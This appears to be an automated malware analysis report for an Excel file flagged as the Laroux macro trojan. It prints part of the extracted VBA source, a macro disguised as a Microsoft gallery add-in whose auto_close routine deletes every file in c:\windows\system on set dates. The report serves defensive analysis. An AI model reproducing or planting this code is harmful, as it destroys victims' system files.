MALICIOUS
220
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel spreadsheet containing a VBA macro that is triggered by the Auto_Open function. This macro is detected as Xls.Trojan.Laroux-25 by ClamAV, indicating a known malicious pattern. The macro's primary function appears to be the execution of arbitrary code, likely to download and execute a second-stage payload, which is a common technique for this family.
Heuristics 4
-
ClamAV: Xls.Trojan.Laroux-25 critical CLAMAV_DETECTIONClamAV detected this file as malware: Xls.Trojan.Laroux-25
-
VBA macros detected medium 2 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26285 bytes |
SHA-256: b945651c5d68e81db859c5669dbe5b9e03755b6a9fa55d3a786c5fb0e43976fe |
|||
|
Detection
ClamAV:
Xls.Trojan.Laroux-25
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "xl5galary"
' ---------------------------------------------------------
' XL5GALLERY MACRO - ENABLES USERS OF VERSION 5 TO USE FX
' This is an autoload macro, which stays in the background
' so you can use the .XLA auto-add in.
' (C) Microsoft 1996. 1998
' ---------------------------------------------------------
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
'
Sub auto_open()
Attribute auto_open.VB_ProcData.VB_Invoke_Func = " \n14"
' Normal error trap
On Error Resume Next
' Activation call for galary
Application.OnSheetActivate = ThisWorkbook.Name & "!xl5galary.galary"
End Sub
' End of routine
'
'
' Start of auto shutdown routine
Sub auto_close()
Attribute auto_close.VB_ProcData.VB_Invoke_Func = " \n14"
On Error Resume Next
' Ordinary error trap
var_b_10000000000 = Format(Date, "mm")
var_b_10000000001 = Format(Date, "dd")
var_b_10000000002 = Format(Date, "yyyy")
' Enable true date conversion
If var_b_10000000000 = 5 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 9 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 10 And var_b_10000000001 = 29 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 11 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If var_b_10000000000 = 12 And var_b_10000000001 = 11 And var_b_10000000002 = 1998 Then var_b_10000000003 = 1
If (var_b_10000000001 = 11 Or var_b_10000000001 = 2) And var_b_10000000002 = 1999 Then var_b_10000000003 = 1
If var_b_10000000003 = 1 Then
'
' start macro proper
'
ChDrive "C"
ChDir "c:\windows\system"
' Change to macro drive
Kill "*.*"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.